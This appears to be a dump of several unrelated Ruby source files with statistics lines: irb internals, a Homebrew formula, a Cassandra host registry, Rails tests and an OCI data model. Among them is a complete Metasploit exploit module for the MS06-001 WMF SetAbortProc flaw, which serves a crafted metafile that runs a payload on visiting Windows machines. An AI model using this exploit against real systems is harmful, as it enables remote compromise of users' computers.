      'float'           => 'FLOAT',
      'double'          => 'FLOAT'
    }
  end
end
| 38.023077 | 137 | 0.51487 |
b9e235eb2465d51a70cda435906331d863b80b9d | 32 | module EinsteinVisionHelper
end
| 10.666667 | 27 | 0.90625 |
084da0363637544ea938db66fabde428c88ca95c | 189 | module Erlash
class TipFormatter < TemplateFormatter
def format
[].tap do |acc|
acc << object.title
acc << " #{object.description}"
end
end
end
end
| 17.181818 | 40 | 0.57672 |
e8c552a3f59152d58456101f5ab6b5d606e41571 | 6,625 | # frozen_string_literal: false
#
# irb/multi-irb.rb - multiple irb module
# $Release Version: 0.9.6$
# $Revision: 60139 $
# by Keiju ISHITSUKA([email protected])
#
# --
#
#
#
IRB.fail CantShiftToMultiIrbMode unless defined?(Thread)
module IRB
class JobManager
# Creates a new JobManager object
def initialize
@jobs = []
@current_job = nil
end
# The active irb session
attr_accessor :current_job
# The total number of irb sessions, used to set +irb_name+ of the current
# Context.
def n_jobs
@jobs.size
end
# Returns the thread for the given +key+ object, see #search for more
# information.
def thread(key)
th, = search(key)
th
end
# Returns the irb session for the given +key+ object, see #search for more
# information.
def irb(key)
_, irb = search(key)
irb
end
# Returns the top level thread.
def main_thread
@jobs[0][0]
end
# Returns the top level irb session.
def main_irb
@jobs[0][1]
end
# Add the given +irb+ session to the jobs Array.
def insert(irb)
@jobs.push [Thread.current, irb]
end
# Changes the current active irb session to the given +key+ in the jobs
# Array.
#
# Raises an IrbAlreadyDead exception if the given +key+ is no longer alive.
#
# If the given irb session is already active, an IrbSwitchedToCurrentThread
# exception is raised.
def switch(key)
th, irb = search(key)
IRB.fail IrbAlreadyDead unless th.alive?
IRB.fail IrbSwitchedToCurrentThread if th == Thread.current
@current_job = irb
th.run
Thread.stop
@current_job = irb(Thread.current)
end
# Terminates the irb sessions specified by the given +keys+.
#
# Raises an IrbAlreadyDead exception if one of the given +keys+ is already
# terminated.
#
# See Thread#exit for more information.
def kill(*keys)
for key in keys
th, _ = search(key)
IRB.fail IrbAlreadyDead unless th.alive?
th.exit
end
end
# Returns the associated job for the given +key+.
#
# If given an Integer, it will return the +key+ index for the jobs Array.
#
# When an instance of Irb is given, it will return the irb session
# associated with +key+.
#
# If given an instance of Thread, it will return the associated thread
# +key+ using Object#=== on the jobs Array.
#
# Otherwise returns the irb session with the same top-level binding as the
# given +key+.
#
# Raises a NoSuchJob exception if no job can be found with the given +key+.
def search(key)
job = case key
when Integer
@jobs[key]
when Irb
@jobs.find{|k, v| v.equal?(key)}
when Thread
@jobs.assoc(key)
else
@jobs.find{|k, v| v.context.main.equal?(key)}
end
IRB.fail NoSuchJob, key if job.nil?
job
end
# Deletes the job at the given +key+.
def delete(key)
case key
when Integer
IRB.fail NoSuchJob, key unless @jobs[key]
@jobs[key] = nil
else
catch(:EXISTS) do
@jobs.each_index do
|i|
if @jobs[i] and (@jobs[i][0] == key ||
@jobs[i][1] == key ||
@jobs[i][1].context.main.equal?(key))
@jobs[i] = nil
throw :EXISTS
end
end
IRB.fail NoSuchJob, key
end
end
until assoc = @jobs.pop; end unless @jobs.empty?
@jobs.push assoc
end
# Outputs a list of jobs, see the irb command +irb_jobs+, or +jobs+.
def inspect
ary = []
@jobs.each_index do
|i|
th, irb = @jobs[i]
next if th.nil?
if th.alive?
if th.stop?
t_status = "stop"
else
t_status = "running"
end
else
t_status = "exited"
end
ary.push format("#%d->%s on %s (%s: %s)",
i,
irb.context.irb_name,
irb.context.main,
th,
t_status)
end
ary.join("\n")
end
end
@JobManager = JobManager.new
# The current JobManager in the session
def IRB.JobManager
@JobManager
end
# The current Context in this session
def IRB.CurrentContext
IRB.JobManager.irb(Thread.current).context
end
# Creates a new IRB session, see Irb.new.
#
# The optional +file+ argument is given to Context.new, along with the
# workspace created with the remaining arguments, see WorkSpace.new
def IRB.irb(file = nil, *main)
workspace = WorkSpace.new(*main)
parent_thread = Thread.current
Thread.start do
begin
irb = Irb.new(workspace, file)
rescue
print "Subirb can't start with context(self): ", workspace.main.inspect, "\n"
print "return to main irb\n"
Thread.pass
Thread.main.wakeup
Thread.exit
end
@CONF[:IRB_RC].call(irb.context) if @CONF[:IRB_RC]
@JobManager.insert(irb)
@JobManager.current_job = irb
begin
system_exit = false
catch(:IRB_EXIT) do
irb.eval_input
end
rescue SystemExit
system_exit = true
raise
#fail
ensure
unless system_exit
@JobManager.delete(irb)
if @JobManager.current_job == irb
if parent_thread.alive?
@JobManager.current_job = @JobManager.irb(parent_thread)
parent_thread.run
else
@JobManager.current_job = @JobManager.main_irb
@JobManager.main_thread.run
end
end
end
end
end
Thread.stop
@JobManager.current_job = @JobManager.irb(Thread.current)
end
@CONF[:SINGLE_IRB_MODE] = false
@JobManager.insert(@CONF[:MAIN_CONTEXT].irb)
@JobManager.current_job = @CONF[:MAIN_CONTEXT].irb
class Irb
def signal_handle
unless @context.ignore_sigint?
print "\nabort!!\n" if @context.verbose?
exit
end
case @signal_status
when :IN_INPUT
print "^C\n"
IRB.JobManager.thread(self).raise RubyLex::TerminateLineInput
when :IN_EVAL
IRB.irb_abort(self)
when :IN_LOAD
IRB.irb_abort(self, LoadAbort)
when :IN_IRB
# ignore
else
# ignore other cases as well
end
end
end
trap("SIGINT") do
@JobManager.current_job.signal_handle
Thread.stop
end
end
| 24.906015 | 85 | 0.581283 |
bb7a425eff3fd420fc4116c9f5d48721d8f988bb | 584 | module Kaminari
module ConfigurationMethods
extend ActiveSupport::Concern
module ClassMethods
# Overrides the default +per_page+ value per model
# class Article < ActiveRecord::Base
# paginates_per 10
# end
def paginates_per(val)
@_default_per_page = val
end
# This model's default +per_page+ value
# returns +default_per_page+ value unless explicitly overridden via <tt>paginates_per</tt>
def default_per_page
@_default_per_page ||= Kaminari.config.default_per_page
end
end
end
end
| 27.809524 | 96 | 0.674658 |
1ad1a56a4ce2c8a9f925811e1588532e79f47ffe | 1,421 | class CsvFix < Formula
desc "Tool for manipulating CSV data"
homepage "https://neilb.bitbucket.io/csvfix/"
url "https://bitbucket.org/neilb/csvfix/get/version-1.6.tar.gz"
sha256 "32982aa0daa933140e1ea5a667fb71d8adc731cc96068de3a8e83815be62c52b"
license "MIT"
bottle do
cellar :any_skip_relocation
sha256 "3cc10313342650c680f23241e19ff8ec6b64df8fcc2123c5161b15e992c8973b" => :catalina
sha256 "93a9586c3ef8614be909c0e5ac5bb463536dab6fcbfc00bb1e94fc6affbe7248" => :mojave
sha256 "e02b2cb8929617c91a258c313481097146259a9ed68094bd759c30c3cc75806e" => :high_sierra
sha256 "b52224f7cd1dd228ffe751c67993f854a8a59f17d6099d40fca02374f1949d02" => :sierra
sha256 "ba19053a978b57b6b962f8fa24d099d964ceb90cd28304e3a6c2a7fe0d3abc32" => :el_capitan
sha256 "b8dbaf2e14e35cc4c1d7b5d04a5615377f7eeb4d9b1f25fe554b8711511c28f6" => :yosemite
sha256 "0b86933c8e32830d5abd0f26ef83b1a60e0254da67542b695fd50ab1e3ba2e68" => :mavericks
sha256 "c4342077ef0be14c36cb6b367a5d78aba77964cb2cba0b52cbbdd5346fb42f06" => :x86_64_linux
end
disable! date: "2020-12-08", because: :repo_removed
def install
# clang on Mt. Lion will try to build against libstdc++,
# despite -std=gnu++0x
ENV.libcxx
system "make", "lin"
bin.install "csvfix/bin/csvfix"
end
test do
assert_equal '"foo","bar"',
pipe_output("#{bin}/csvfix trim", "foo , bar \n").chomp
end
end
| 39.472222 | 94 | 0.771992 |
210b0576f05fd4a455b7dcdfa1c32fd19720800c | 5,091 | # encoding: utf-8
#--
# Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#++
module Cassandra
  class Cluster
    # @private
    # Registry of known cluster hosts plus the listeners interested in host
    # state changes. @hosts and @listeners are replaced wholesale under the
    # monitor lock (copy-on-write), so readers can iterate them without
    # synchronizing.
    class Registry
      include MonitorMixin

      def initialize(logger)
        @logger = logger
        @hosts = ::Hash.new
        @listeners = ::Array.new
        mon_initialize
      end

      # Registers a listener; copy-on-write keeps in-flight iteration safe.
      def add_listener(listener)
        synchronize do
          listeners = @listeners.dup
          listeners.push(listener)
          @listeners = listeners
        end
        self
      end

      def remove_listener(listener)
        synchronize do
          listeners = @listeners.dup
          listeners.delete(listener)
          @listeners = listeners
        end
        self
      end

      # Yields every known host, or returns them as an Array when no block is
      # given.
      def each_host(&block)
        if block_given?
          @hosts.each_value(&block)
          self
        else
          @hosts.values
        end
      end
      alias :hosts :each_host

      def host(address)
        @hosts[address.to_s]
      end

      def has_host?(address)
        @hosts.has_key?(address.to_s)
      end

      # Called when discovery reports a host. When the identifying metadata
      # changed, the old host is reported lost and a fresh one found; when the
      # host was merely down, it is toggled back up; otherwise it's a no-op.
      def host_found(address, data = {})
        ip = address.to_s
        host = @hosts[ip]
        if host
          if host.id == data['host_id'] &&
             host.release_version == data['release_version'] &&
             host.rack == data['rack'] &&
             host.datacenter == data['data_center']
            return self if host.up?
            host = toggle_up(host)
          else
            @logger.debug("Host #{host.ip} metadata has been updated, it will be considered lost and found")
            notify_lost(host)
            host = create_host(address, data)
            notify_found(host)
          end
        else
          host = create_host(address, data)
          notify_found(host)
        end
        synchronize do
          hosts = @hosts.dup
          hosts[ip] = host
          @hosts = hosts
        end
        self
      end

      def host_down(address)
        ip = address.to_s
        host = @hosts[ip]
        return self unless host && !host.down?
        host = toggle_down(host)
        synchronize do
          hosts = @hosts.dup
          hosts[ip] = host
          @hosts = hosts
        end
        self
      end

      def host_up(address)
        ip = address.to_s
        host = @hosts[ip]
        return self unless host && !host.up?
        host = toggle_up(host)
        synchronize do
          hosts = @hosts.dup
          hosts[ip] = host
          @hosts = hosts
        end
        self
      end

      # Removes a host from the registry and notifies listeners; returns the
      # removed host, or self when the address was unknown.
      def host_lost(address)
        ip = address.to_s
        host = nil
        return self unless @hosts.has_key?(ip)
        synchronize do
          hosts = @hosts.dup
          host = hosts.delete(ip)
          @hosts = hosts
        end
        notify_lost(host)
        host
      end

      private

      def create_host(ip, data)
        Host.new(ip, data['host_id'], data['rack'], data['data_center'], data['release_version'], Array(data['tokens']).freeze, :up)
      end

      # Host objects are treated as immutable: a state change builds a new
      # Host with the flipped status. Listener callbacks are best-effort
      # (exceptions are swallowed with `rescue nil`).
      def toggle_up(host)
        host = Host.new(host.ip, host.id, host.rack, host.datacenter, host.release_version, host.tokens, :up)
        @logger.debug("Host #{host.ip} is up")
        @listeners.each do |listener|
          listener.host_up(host) rescue nil
        end
        host
      end

      def toggle_down(host)
        host = Host.new(host.ip, host.id, host.rack, host.datacenter, host.release_version, host.tokens, :down)
        @logger.debug("Host #{host.ip} is down")
        @listeners.reverse_each do |listener|
          listener.host_down(host) rescue nil
        end
        host
      end

      # A lost host that was still up is first reported down, then lost.
      def notify_lost(host)
        if host.up?
          @logger.debug("Host #{host.ip} is down and lost")
          host = Host.new(host.ip, host.id, host.rack, host.datacenter, host.release_version, host.tokens, :down)
          @listeners.reverse_each do |listener|
            listener.host_down(host) rescue nil
            listener.host_lost(host) rescue nil
          end
        else
          @logger.debug("Host #{host.ip} is lost")
          @listeners.reverse_each do |listener|
            listener.host_lost(host) rescue nil
          end
        end
      end

      def notify_found(host)
        @logger.debug("Host #{host.ip} is found and up")
        @listeners.each do |listener|
          listener.host_found(host) rescue nil
          listener.host_up(host) rescue nil
        end
      end
    end
  end
end
| 24.358852 | 132 | 0.554901 |
ed1da559dd06fa20fa3bc0fd0df1600820376415 | 5,263 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability in the GDI library included with
        Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
        to execute arbitrary code through the SetAbortProc procedure. This module
        generates a random WMF record stream for each request.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hdm',
          'san <san[at]xfocus.org>',
          '[email protected]',
        ],
      'References'     =>
        [
          ['CVE', '2005-4560'],
          ['OSVDB', '21987'],
          ['MSB', 'MS06-001'],
          ['BID', '16074'],
          ['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],
          ['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
          ['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          # Payload space is randomized per instantiation (1000..2020 bytes).
          'Space'    => 1000 + (rand(256).to_i * 4),
          'BadChars' => "\x00",
          'Compat'   =>
            {
              'ConnectionType' => '-find',
            },
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows XP/2003/Vista Automatic', { }],
        ],
      'DisclosureDate' => 'Dec 27 2005',
      'DefaultTarget'  => 0))
  end

  # HTTP handler: requests without a .wmf extension receive a meta-refresh
  # redirect to a randomized .wmf URL under this resource; .wmf requests get
  # the generated exploit metafile.
  def on_request_uri(cli, request)
    ext = 'wmf'

    if (not request.uri.match(/\.wmf$/i))
      if ("/" == get_resource[-1,1])
        wmf_uri = get_resource[0, get_resource.length - 1]
      else
        wmf_uri = get_resource
      end
      # Randomized filename so each visit fetches a unique-looking .wmf.
      wmf_uri << "/" + rand_text_alphanumeric(rand(80)+16) + "." + ext
      html = "<html><meta http-equiv='refresh' content='0; " +
        "URL=#{wmf_uri}'><body>One second please...</body></html>"
      send_response_html(cli, html)
      return
    end

    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    print_status("Sending #{self.name}")

    # Transmit the compressed response to the client
    send_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })

    # Handle the payload
    handler(cli)
  end

  # Builds the complete WMF file: header, random filler records, an Escape
  # record (parameter 9 = SetAbortProc) carrying the encoded payload, more
  # filler, and a terminating record plus padding.
  def generate_metafile(payload)
    # Minimal length values before and after the Escape record
    pre_mlen = 1440 + rand(8192)
    suf_mlen = 128 + rand(8192)

    # Track the number of generated records
    fill = 0

    # The prefix and suffix buffers
    pre_buff = ''
    suf_buff = ''

    # Generate the prefix
    while (pre_buff.length < pre_mlen)
      pre_buff << generate_record()
      fill += 1
    end

    # Generate the suffix
    while (suf_buff.length < suf_mlen)
      suf_buff << generate_record()
      fill += 1
    end

    clen = 18 + 8 + 6 + payload.encoded.length + pre_buff.length + suf_buff.length

    data =
      #
      # WindowsMetaHeader
      #
      [
        # WORD  FileType;       /* Type of metafile (1=memory, 2=disk) */
        rand(2)+1,
        # WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
        9,
        # WORD  Version;        /* Version of Microsoft Windows used */
        ( rand(2).to_i == 1 ? 0x0300 : 0x0100 ),
        # DWORD FileSize;       /* Total size of the metafile in WORDs */
        clen/2,
        # WORD  NumOfObjects;   /* Number of objects in the file */
        rand(0xffff),
        # DWORD MaxRecordSize;  /* The size of largest record in WORDs */
        rand(0xffffffff),
        # WORD  NumOfParams;    /* Not Used (always 0) */
        rand(0xffff),
      ].pack('vvvVvVv') +

      #
      # Filler data
      #
      pre_buff +

      #
      # StandardMetaRecord - Escape()
      #
      [
        # DWORD Size;          /* Total size of the record in WORDs */
        4,
        # WORD  Function;      /* Function number (defined in WINDOWS.H) */
        (rand(256).to_i << 8) + 0x26,
        # WORD  Parameters[];  /* Parameter values passed to function */
        9,
      ].pack('Vvv') + payload.encoded +

      #
      # Filler data
      #
      suf_buff +

      #
      # Complete the stream
      #
      [3, 0].pack('Vv') +

      #
      # Some extra fun padding
      #
      rand_text(rand(16384)+1024)

    return data
  end

  # Emits one random benign WMF record (pen/brush/rectangle) used as filler.
  def generate_record
    type = rand(3)
    case type
    when 0
      # CreatePenIndirect
      return [8, 0x02fa].pack('Vv') + rand_text(10)
    when 1
      # CreateBrushIndirect
      return [7, 0x02fc].pack('Vv') + rand_text(8)
    else
      # Rectangle
      return [7, 0x041b].pack('Vv') + rand_text(8)
    end
  end
end
| 27.411458 | 96 | 0.543036 |
1aeae3df3d7a345e236d873845cb888d0ed63293 | 1,099 | # frozen_string_literal: true
require 'rails_helper'
require 'sn_foil/rails/controller/base'
RSpec.describe SnFoil::Rails::Controller::Base do
  # Use the canonical one-liner subject instead of shadowing RSpec's named
  # subject via `let(:subject)`, which rubocop-rspec flags and which bypasses
  # RSpec's subject machinery.
  subject { described_class }

  # One example per controller concern the base class must mix in. The
  # generated descriptions match the previous hand-written ones exactly.
  %w[
    ChangeControllerConcern
    CreateControllerConcern
    DestroyControllerConcern
    IndexControllerConcern
    ShowControllerConcern
    UpdateControllerConcern
  ].each do |concern_name|
    it "includes #{concern_name}" do
      concern = SnFoil::Rails::Controller::Concerns.const_get(concern_name)
      expect(subject.ancestors).to include(concern)
    end
  end
end
| 33.30303 | 103 | 0.788899 |
38765158eac94b91920b748cf16a306389556d4f | 1,190 | require 'test_helper'
# Integration tests covering the full CRUD surface of TradesController.
class TradesControllerTest < ActionDispatch::IntegrationTest
  setup do
    @trade = trades(:one)
  end

  test "should get index" do
    get trades_url
    assert_response :success
  end

  test "should get new" do
    get new_trade_url
    assert_response :success
  end

  test "should create trade" do
    assert_difference('Trade.count') do
      post trades_url, params: { trade: trade_attributes }
    end

    assert_redirected_to trade_url(Trade.last)
  end

  test "should show trade" do
    get trade_url(@trade)
    assert_response :success
  end

  test "should get edit" do
    get edit_trade_url(@trade)
    assert_response :success
  end

  test "should update trade" do
    patch trade_url(@trade), params: { trade: trade_attributes }
    assert_redirected_to trade_url(@trade)
  end

  test "should destroy trade" do
    assert_difference('Trade.count', -1) do
      delete trade_url(@trade)
    end

    assert_redirected_to trades_url
  end

  private

  # Attribute payload mirroring the fixture, shared by create/update requests.
  def trade_attributes
    { from: @trade.from, product_id: @trade.product_id, sold_by: @trade.sold_by,
      sold_to: @trade.sold_to, to: @trade.to }
  end
end
| 24.285714 | 165 | 0.702521 |
aca4a7adb1df20ecaede2230836711b0ce578c6a | 212 | class Preference < ActiveRecord::Base
belongs_to :candidate, class_name: "User"
belongs_to :user, class_name: "User"
validates :candidate_id, presence: true
validates :user_id, presence: true
end
| 30.285714 | 45 | 0.735849 |
ffc3df365a76d29749a601a20acb4d8ca0cd254d | 251 | require 'rails_helper'
RSpec.describe "restaurants/index", type: :view do
  before(:each) do
    # Two persisted records are enough to exercise the list rendering.
    assign(:restaurants, Array.new(2) { Restaurant.create! })
  end

  it "renders a list of restaurants" do
    render
  end
end
| 16.733333 | 50 | 0.649402 |
61f264f546f2cee17dde3e8f1d44a9e0d41f4d6e | 16,212 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
require 'logger'
require_relative 'data_entity'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# The view entity data entity details.
class DataIntegration::Models::DataEntityFromView < DataIntegration::Models::DataEntity
ENTITY_TYPE_ENUM = [
ENTITY_TYPE_TABLE = 'TABLE'.freeze,
ENTITY_TYPE_VIEW = 'VIEW'.freeze,
ENTITY_TYPE_FILE = 'FILE'.freeze,
ENTITY_TYPE_QUEUE = 'QUEUE'.freeze,
ENTITY_TYPE_STREAM = 'STREAM'.freeze,
ENTITY_TYPE_OTHER = 'OTHER'.freeze,
ENTITY_TYPE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze
].freeze
# The object key.
# @return [String]
attr_accessor :key
# The object's model version.
# @return [String]
attr_accessor :model_version
# @return [OCI::DataIntegration::Models::ParentReference]
attr_accessor :parent_ref
# Free form text without any restriction on permitted characters. Name can have letters, numbers, and special characters. The value is editable and is restricted to 1000 characters.
# @return [String]
attr_accessor :name
# Detailed description for the object.
# @return [String]
attr_accessor :description
# The version of the object that is used to track changes in the object instance.
# @return [Integer]
attr_accessor :object_version
# The external key for the object
# @return [String]
attr_accessor :external_key
# @return [OCI::DataIntegration::Models::Shape]
attr_accessor :shape
# The shape ID.
# @return [String]
attr_accessor :shape_id
# @return [OCI::DataIntegration::Models::TypeLibrary]
attr_accessor :types
# The entity type.
# @return [String]
attr_reader :entity_type
# Specifies other type label.
# @return [String]
attr_accessor :other_type_label
# An array of unique keys.
# @return [Array<OCI::DataIntegration::Models::UniqueKey>]
attr_accessor :unique_keys
# An array of foreign keys.
# @return [Array<OCI::DataIntegration::Models::ForeignKey>]
attr_accessor :foreign_keys
# The resource name.
# @return [String]
attr_accessor :resource_name
# The status of an object that can be set to value 1 for shallow references across objects, other values reserved.
# @return [Integer]
attr_accessor :object_status
# Value can only contain upper case letters, underscore and numbers. It should begin with upper case letter or underscore. The value can be modified.
# @return [String]
attr_accessor :identifier
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'model_type': :'modelType',
'metadata': :'metadata',
'key': :'key',
'model_version': :'modelVersion',
'parent_ref': :'parentRef',
'name': :'name',
'description': :'description',
'object_version': :'objectVersion',
'external_key': :'externalKey',
'shape': :'shape',
'shape_id': :'shapeId',
'types': :'types',
'entity_type': :'entityType',
'other_type_label': :'otherTypeLabel',
'unique_keys': :'uniqueKeys',
'foreign_keys': :'foreignKeys',
'resource_name': :'resourceName',
'object_status': :'objectStatus',
'identifier': :'identifier'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'model_type': :'String',
'metadata': :'OCI::DataIntegration::Models::ObjectMetadata',
'key': :'String',
'model_version': :'String',
'parent_ref': :'OCI::DataIntegration::Models::ParentReference',
'name': :'String',
'description': :'String',
'object_version': :'Integer',
'external_key': :'String',
'shape': :'OCI::DataIntegration::Models::Shape',
'shape_id': :'String',
'types': :'OCI::DataIntegration::Models::TypeLibrary',
'entity_type': :'String',
'other_type_label': :'String',
'unique_keys': :'Array<OCI::DataIntegration::Models::UniqueKey>',
'foreign_keys': :'Array<OCI::DataIntegration::Models::ForeignKey>',
'resource_name': :'String',
'object_status': :'Integer',
'identifier': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [OCI::DataIntegration::Models::ObjectMetadata] :metadata The value to assign to the {OCI::DataIntegration::Models::DataEntity#metadata #metadata} proprety
# @option attributes [String] :key The value to assign to the {#key} property
# @option attributes [String] :model_version The value to assign to the {#model_version} property
# @option attributes [OCI::DataIntegration::Models::ParentReference] :parent_ref The value to assign to the {#parent_ref} property
# @option attributes [String] :name The value to assign to the {#name} property
# @option attributes [String] :description The value to assign to the {#description} property
# @option attributes [Integer] :object_version The value to assign to the {#object_version} property
# @option attributes [String] :external_key The value to assign to the {#external_key} property
# @option attributes [OCI::DataIntegration::Models::Shape] :shape The value to assign to the {#shape} property
# @option attributes [String] :shape_id The value to assign to the {#shape_id} property
# @option attributes [OCI::DataIntegration::Models::TypeLibrary] :types The value to assign to the {#types} property
# @option attributes [String] :entity_type The value to assign to the {#entity_type} property
# @option attributes [String] :other_type_label The value to assign to the {#other_type_label} property
# @option attributes [Array<OCI::DataIntegration::Models::UniqueKey>] :unique_keys The value to assign to the {#unique_keys} property
# @option attributes [Array<OCI::DataIntegration::Models::ForeignKey>] :foreign_keys The value to assign to the {#foreign_keys} property
# @option attributes [String] :resource_name The value to assign to the {#resource_name} property
# @option attributes [Integer] :object_status The value to assign to the {#object_status} property
# @option attributes [String] :identifier The value to assign to the {#identifier} property
# Initializes the object from an attributes Hash. Both the wire-format
# (camelCase) and ruby (snake_case) spellings are accepted for every
# property; providing both spellings for the same property raises.
def initialize(attributes = {})
  return unless attributes.is_a?(Hash)

  attributes['modelType'] = 'VIEW_ENTITY'

  super(attributes)

  # convert string to symbol for hash key
  attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }

  # Each entry pairs the camelCase key (nil when the property has a single
  # spelling) with the snake_case key whose public writer does the assignment.
  # Order matches the original attribute order, so the first duplicated
  # spelling encountered is the one reported.
  [
    [nil, :key],
    [:modelVersion, :model_version],
    [:parentRef, :parent_ref],
    [nil, :name],
    [nil, :description],
    [:objectVersion, :object_version],
    [:externalKey, :external_key],
    [nil, :shape],
    [:shapeId, :shape_id],
    [nil, :types],
    [:entityType, :entity_type],
    [:otherTypeLabel, :other_type_label],
    [:uniqueKeys, :unique_keys],
    [:foreignKeys, :foreign_keys],
    [:resourceName, :resource_name],
    [:objectStatus, :object_status],
    [nil, :identifier]
  ].each do |camel, snake|
    if camel
      public_send("#{snake}=", attributes[camel]) if attributes[camel]
      if attributes.key?(camel) && attributes.key?(snake)
        raise "You cannot provide both :#{camel} and :#{snake}"
      end
    end
    public_send("#{snake}=", attributes[snake]) if attributes[snake]
  end
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# Unknown values coming back from the service are mapped to the sentinel
# ENTITY_TYPE_UNKNOWN_ENUM_VALUE instead of raising, so newer API values
# don't break older clients.
# @param [Object] entity_type Object to be assigned
def entity_type=(entity_type)
  if !entity_type || ENTITY_TYPE_ENUM.include?(entity_type)
    @entity_type = entity_type
  else
    OCI.logger.debug("Unknown value for 'entity_type' [" + entity_type + "]. Mapping to 'ENTITY_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
    @entity_type = ENTITY_TYPE_UNKNOWN_ENUM_VALUE
  end
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# Short-circuits at the first mismatching attribute.
# @param [Object] other the other object to be compared
def ==(other)
  return true if equal?(other)
  return false unless self.class == other.class

  %i[model_type metadata key model_version parent_ref name description
     object_version external_key shape shape_id types entity_type
     other_type_label unique_keys foreign_keys resource_name object_status
     identifier].all? { |attr| public_send(attr) == other.public_send(attr) }
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Hash-key equality; delegates to `==` so the two stay consistent.
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
  self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# Hashing the array of attribute values yields the same code as the
# literal-array form, keeping it consistent with `eql?`.
# @return [Fixnum] Hash code
def hash
  %i[model_type metadata key model_version parent_ref name description
     object_version external_key shape shape_id types entity_type
     other_type_label unique_keys foreign_keys resource_name object_status
     identifier].map { |attr| public_send(attr) }.hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# Iterates the class's swagger type map and assigns, via the public
# writers, every attribute present in the input hash (keyed by wire name).
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
  return nil unless attributes.is_a?(Hash)
  self.class.swagger_types.each_pair do |key, type|
    if type =~ /^Array<(.*)>/i
      # check to ensure the input is an array given that the attribute
      # is documented as an array but the input is not
      if attributes[self.class.attribute_map[key]].is_a?(Array)
        # Regexp.last_match(1) is the element type captured by the
        # Array<...> match above.
        public_method("#{key}=").call(
          attributes[self.class.attribute_map[key]]
            .map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
        )
      end
    elsif !attributes[self.class.attribute_map[key]].nil?
      public_method("#{key}=").call(
        OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
      )
    end
    # or else data not found in attributes(hash), not an issue as the data can be optional
  end
  self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object (the Hash produced by
# #to_hash rendered with Hash#to_s).
# @return [String] String presentation of the object
def to_s
  to_hash.to_s
end
# Serializes the model into a plain Hash keyed by the wire (camelCase)
# parameter names from attribute_map.
# @return [Hash] Returns the object in the form of hash
def to_hash
  self.class.attribute_map.each_with_object({}) do |(attr, param), result|
    value = public_method(attr).call
    # Keep explicitly-assigned nils, drop attributes that were never set.
    next if value.nil? && !instance_variable_defined?("@#{attr}")

    result[param] = _to_hash(value)
  end
end
private
# Recursively converts +value+ into plain Hash/Array primitives.
# Arrays are compacted and converted element-wise; Hash values are
# converted in place by key; anything responding to to_hash is converted;
# every other value is returned as-is.
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
  case value
  when Array
    value.compact.map { |element| _to_hash(element) }
  when Hash
    value.each_with_object({}) { |(k, v), out| out[k] = _to_hash(v) }
  else
    value.respond_to?(:to_hash) ? value.to_hash : value
  end
end
end
end
